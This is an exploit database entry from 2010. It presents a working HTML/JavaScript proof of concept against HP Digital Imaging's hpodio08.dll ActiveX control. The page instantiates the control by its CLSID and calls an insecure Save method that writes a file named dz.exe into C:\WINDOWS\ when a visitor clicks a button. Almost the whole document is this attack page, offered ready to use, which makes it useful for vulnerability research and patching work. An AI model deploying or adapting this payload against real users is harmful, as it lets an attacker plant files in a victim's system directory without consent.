HP Digital Imaging - 'hpodio08.dll' Insecure Method

EDB-ID:

12367

CVE:

N/A




Platform:

Windows

Date:

2010-04-24


# Exploit Title: HP Digital Imaging (hpodio08.dll) Insecure Method Exploit 
# Author: ThE g0bL!N
# Version: All vesion 
# Tested on: Windows xp pack 2
# Code : <title>Exploited By : ThE g0bL!N </title> 
<BODY> 
<object id=dz classid="clsid:{697F5209-0494-11D6-A2B0-0060B0FBD872}"></object> 

<SCRIPT> 

function Do_it() 
{ 
File = "dz.exe" 
dz.Save(File) 
} 

</SCRIPT> 
<h3>HP Digital Imaging (hpodio08.dll) Insecure Method Exploit </h3> 
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> 
</body> 
</HTML>
## Note: Dz.exe Will be created In C:\WINDOWS\ :) 
## 01110010 01100001 01111010 01101001 01101011 01100001 00100000 I try To hate You but i can't